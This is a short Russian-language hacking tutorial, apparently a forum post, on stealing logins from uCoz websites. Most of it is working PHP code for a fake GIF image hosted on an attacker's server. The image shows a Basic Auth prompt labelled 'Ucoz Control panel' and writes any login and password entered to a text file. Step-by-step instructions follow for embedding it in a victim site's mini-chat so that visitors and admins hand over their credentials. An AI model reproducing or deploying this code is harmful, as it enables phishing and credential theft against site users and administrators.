Всем привет, сегодня я расскажу как взломать сайт на ucoz! Но это лишь одна из немногих дыр.  Приступим...........Первое, что нужно сделать, это зарегистрировать аккаунт на хостинге (можно бесплатном) с поддержкой php скриптов.
Второе, создать пустой файл в блокноте profili.txt (именно так назвать) и скачать смайл с расширением .gif (назвать smile.gif).
Третье, открыть блокнот и вставить следующий текст:
header("Content-type: image/gif");
$image = imagecreatefromgif('smile.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('profili.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
После этого сохраните под именем cool с расширением gif. Все наше «добро» заливаем на наш хостинг. Подготовительная часть завершена, но не радуйтесь раньше времени. Теперь зарегистрируемся на сайте (разумеется на ucoz, вы же ищите как взломать сайт на ucoz?) жертвы. Бежим в мини чат и пишем там такую штуку: [IMG]адрес хостинга/cool.gif[/IMG]
Если в чате появится смайл прыгайте от радости вы взломали сайт на ucoz'е! Теперь все кто будут входить на сайт (включая и админа) будут отправлять свои логины и пароли в раннее созданный файл profili.txt. Всем удачи в ваших начинаниях!
| 